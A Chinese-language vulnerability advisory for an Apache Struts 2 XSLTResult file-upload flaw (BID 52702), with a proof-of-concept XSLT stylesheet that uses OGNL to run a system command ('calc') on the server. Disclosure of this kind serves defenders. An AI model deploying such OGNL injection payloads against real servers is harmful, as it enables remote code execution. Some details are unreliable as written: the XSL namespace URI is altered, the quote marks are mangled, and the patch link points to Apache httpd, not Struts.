Apache Struts2 ‘XSLTResult.java’远程任意文件上传漏洞

受影响系统:

Apache Group Struts 2.x

描述:


BUGTRAQ  ID: 52702

Apache Struts是一款开发Java Web应用程序的开源Web应用框架。

Apache Struts在实现上存在安全漏洞,攻击者可利用此漏洞在网络服务器进程中运行上传的脚本代码,导致非法访问或权限提升。

<*来源:voidloafer
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?xml version=”1.0″ encoding=”UTF-8″ ?>
<xsl:stylesheet xmlns:xsl=”http://www.example.com/1999/XSL/Transform”
version=”1.0″ xmlns:ognl=”ognl.Ognl”>
<xsl:template match=”/”>
<html>
<body>
<h2>hacked by kxlzx</h2>
<h2>http://www.example.com</h2>
<exp>
<xsl:value-of select=”ognl:getValue(‘@Runtime@getRuntime().exec(“calc”)’, ”)”/>
</exp>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

建议:


厂商补丁:

Apache Group
————
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://httpd.apache.org/

评论关闭。